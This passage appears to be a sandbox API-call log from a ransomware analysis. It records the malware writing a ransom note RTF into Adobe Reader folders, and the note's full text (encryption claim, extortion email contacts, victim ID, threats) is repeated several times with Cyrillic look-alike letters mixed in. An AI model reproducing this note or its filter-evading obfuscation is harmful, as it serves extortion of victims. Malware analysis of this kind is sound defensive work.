job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.279] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.281] CloseHandle (hObject=0x1cc) returned 1 [0066.281] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\bg85_info.rtf")) returned 0xffffffff [0066.281] GetLastError () returned 0x2 [0066.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with 